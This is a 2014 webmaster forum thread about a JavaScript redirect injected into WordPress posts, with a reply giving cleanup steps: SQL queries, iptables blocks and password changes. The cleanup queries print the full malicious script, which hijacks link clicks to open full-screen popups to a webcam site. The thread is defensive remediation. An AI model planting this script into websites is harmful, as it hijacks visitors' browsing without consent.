Wordpress malware - GoFuckYourself.com

ApolloCash · 09-10-2014, 05:00 AM

hey

i apologize if this is not the right place where to start this thread, anyway:

We run plenty of blogs, recently some of them have been injected with a javascript redirect script. The place of injection: DB table wp_posts -> post_content
The JS code is added at the end of the post.

The script redirects to a webcam site by cashnude.

I have googled a lot, could find only how to remove the injected script, but the injection was back next day of course.

I could not find any information on how they inject the javascript redirect.

I suspect WP plugin, WP theme or WP core vulnerability, however only newly created blogs like 1 year old seem to be injected, WP core version 3.7.1 + older WP core versions
seem to be intact.
Blogs with various WP plugins and WP themes have been injected.

Does anybody have an experience with this JS redirect by cashnude?

Any response will be appreciated.

Thanks!

TROLLENSTEIN · 09-10-2014, 06:39 AM

Hello, I'm assuming all your blogs are on the apollocash server. Here is how to kill it and prevent it from coming back in 5 easy steps:

1. Delete ALL cookies in your browser, and empty your browser cache. Close your browser down. (Do NOT visit the "infected" sites!)

2. Open your browser again and log into your server PHPMYADMIN and run both cleaning queries below. (Depending on your database structure you may need to run these on all of them!)

First query to run is...

Code:

update wp_posts set post_content = replace(post_content, '<script type="text/javascript">// <![CDATA[

function consoleLog(e){try{console.log(e)}catch(t){}}(function(e,t){function n(){if(!s){s=true;for(var e=0;e<i.length;e++){i[e].fn.call(window,i[e].ctx)}i=[]}}function r(){if(document.readyState==="complete"){n()}}e=e||"docReady";t=t||window;var i=[];var s=false;var o=false;t[e]=function(e,t){if(s){setTimeout(function(){e(t)},1);return}else{i.push({fn:e,ctx:t})}if(document.readyState==="complete"){setTimeout(n,1)}else if(!o){if(document.addEventListener){document.addEventListener("DOMContentLoaded",n,false);window.addEventListener("load",n,false)}else{document.attachEvent("onreadystatechange",r);window.attachEvent("onload",n)}o=true}}})("docReady",window);var aMs=document.getElementsByTagName("a");var amSwindow=false;docReady(function(){for(var e=0;e<aMs.length;e++){aMs[e].addEventListener("click",function(e){var t=Math.floor(Math.random()*2+1);consoleLog("ps:"+t);if(t==2){if(!amSwindow){amSwindow=window.open("http://fish-14j-js.cashnude.com/","NEI","width=10000,height=10000")}else{amSwindow.focus()}}},false)}})

// ]]></script>', '') where post_content like '%<script type="text/javascript">// <![CDATA[

function consoleLog(e){try{console.log(e)}catch(t){}}(function(e,t){function n(){if(!s){s=true;for(var e=0;e<i.length;e++){i[e].fn.call(window,i[e].ctx)}i=[]}}function r(){if(document.readyState==="complete"){n()}}e=e||"docReady";t=t||window;var i=[];var s=false;var o=false;t[e]=function(e,t){if(s){setTimeout(function(){e(t)},1);return}else{i.push({fn:e,ctx:t})}if(document.readyState==="complete"){setTimeout(n,1)}else if(!o){if(document.addEventListener){document.addEventListener("DOMContentLoaded",n,false);window.addEventListener("load",n,false)}else{document.attachEvent("onreadystatechange",r);window.attachEvent("onload",n)}o=true}}})("docReady",window);var aMs=document.getElementsByTagName("a");var amSwindow=false;docReady(function(){for(var e=0;e<aMs.length;e++){aMs[e].addEventListener("click",function(e){var t=Math.floor(Math.random()*2+1);consoleLog("ps:"+t);if(t==2){if(!amSwindow){amSwindow=window.open("http://fish-14j-js.cashnude.com/","NEI","width=10000,height=10000")}else{amSwindow.focus()}}},false)}})

// ]]></script>%';

And the second query is...

Code:

update wp_posts set post_content = replace(post_content, '<script  type='text/javascript' rel="f179568d5746648ce97a252d9b3db074">

function consoleLog(e){try{console.log(e)}catch(t){}}(function(e,t){function n(){if(!s){s=true;for(var e=0;e<i.length;e++){i[e].fn.call(window,i[e].ctx)}i=[]}}function r(){if(document.readyState==="complete"){n()}}e=e||"docReady";t=t||window;var i=[];var s=false;var o=false;t[e]=function(e,t){if(s){setTimeout(function(){e(t)},1);return}else{i.push({fn:e,ctx:t})}if(document.readyState==="complete"){setTimeout(n,1)}else if(!o){if(document.addEventListener){document.addEventListener("DOMContentLoaded",n,false);window.addEventListener("load",n,false)}else{document.attachEvent("onreadystatechange",r);window.attachEvent("onload",n)}o=true}}})("docReady",window);var aMs=document.getElementsByTagName("a");var amSwindow=false;docReady(function(){for(var e=0;e<aMs.length;e++){aMs[e].addEventListener("click",function(e){var t=Math.floor(Math.random()*2+1);consoleLog("ps:"+t);if(t==2){if(!amSwindow){amSwindow=window.open("http://fish-14j-js.cashnude.com/","NEI","width=10000,height=10000")}else{amSwindow.focus()}}},false)}})

</script>', '') where post_content like '%<script  type='text/javascript' rel="f179568d5746648ce97a252d9b3db074">

function consoleLog(e){try{console.log(e)}catch(t){}}(function(e,t){function n(){if(!s){s=true;for(var e=0;e<i.length;e++){i[e].fn.call(window,i[e].ctx)}i=[]}}function r(){if(document.readyState==="complete"){n()}}e=e||"docReady";t=t||window;var i=[];var s=false;var o=false;t[e]=function(e,t){if(s){setTimeout(function(){e(t)},1);return}else{i.push({fn:e,ctx:t})}if(document.readyState==="complete"){setTimeout(n,1)}else if(!o){if(document.addEventListener){document.addEventListener("DOMContentLoaded",n,false);window.addEventListener("load",n,false)}else{document.attachEvent("onreadystatechange",r);window.attachEvent("onload",n)}o=true}}})("docReady",window);var aMs=document.getElementsByTagName("a");var amSwindow=false;docReady(function(){for(var e=0;e<aMs.length;e++){aMs[e].addEventListener("click",function(e){var t=Math.floor(Math.random()*2+1);consoleLog("ps:"+t);if(t==2){if(!amSwindow){amSwindow=window.open("http://fish-14j-js.cashnude.com/","NEI","width=10000,height=10000")}else{amSwindow.focus()}}},false)}})

</script>%';

You can Copy & Paste the 2 queries above into PHPMYADMIN and they should run fine.

3. Exit out of PHPMYADMIN and close your browser for now.

4. SSH into your server and run the following to your IPTABLES. (simply drop all packets from the payload site and cashnude servers. If you have not created IPTABLES before now (and you should have!) let me know in a reply and I will provide a fresh complete set for you.)

Code:

iptables -I INPUT -s 213.207.70.38 -j DROP
iptables -I INPUT -s 31.186.174.178 -j DROP

Then save your new IPTABLES lines with:

Code:

/sbin/service iptables save

Then restart Apache, for good measure, with:

Code:

service httpd restart

5. Change your SSH and FTP passwords immediately (just good practice).

As for how they done it, without access to your server I can't offer you an honest 100% exact answer. I did, however, take a quick look and it appears your server has not been hardened in any way. I would start by removing your PHPEXEC widgets (very dangerous!) and then lock the server down to prevent (well, at least make it harder to do as nothing is 100% secure) this in future.

ApolloCash · 09-10-2014, 07:31 AM

hello, thank you for the advice, i have forwarded it to our server admin.
ssh/ftp/mysql passwords changed already.

One more question, we host some ads on our blogs, header/footer ads, sidebar ads, i would remove all phpexec plugins in no time as you recommended, but what else to use in order to use our php based ads rotator?

ApolloCash · 09-13-2014, 10:09 AM

bump bump

09-10-2014, 05:00 AM	#1
ApolloCash Confirmed User Industry Role: Join Date: Apr 2007 Posts: 483	Wordpress malware hey i apologize if this is not the right place where to start this thread, anyway: We run plenty of blogs, recently some of them have been injected with a javascript redirect script. The place of injection: DB table wp_posts -> post_content The JS code is added at the end of the post. The script redirects to a webcam site by cashnude. I have googled a lot, could find only how to remove the injected script, but the injection was back next day of course. I could not find any information on how they inject the javascript redirect. I suspect WP plugin, WP theme or WP core vulnerability, however only newly created blogs like 1 year old seem to be injected, WP core version 3.7.1 + older WP core versions seem to be intact. Blogs with various WP plugins and WP themes have been injected. Does anybody have an experience with this JS redirect by cashnude? Any response will be appreciated. Thanks! __________________ Peter info[} apollocash[} com icq: 176-73--77-01 Last edited by ApolloCash; 09-10-2014 at 05:01 AM..

09-10-2014, 07:31 AM	#3
ApolloCash Confirmed User Industry Role: Join Date: Apr 2007 Posts: 483	hello, thank you for the advice, i have forwarded it to our server admin. ssh/ftp/mysql passwords changed already. One more question, we host some ads on our blogs, header/footer ads, sidebar ads, i would remove all phpexec plugins in no time as you recommended, but what else to use in order to use our php based ads rotator? __________________ Peter info[} apollocash[} com icq: 176-73--77-01 Last edited by ApolloCash; 09-10-2014 at 07:37 AM..

09-13-2014, 10:09 AM	#4
ApolloCash Confirmed User Industry Role: Join Date: Apr 2007 Posts: 483	bump bump __________________ Peter info[} apollocash[} com icq: 176-73--77-01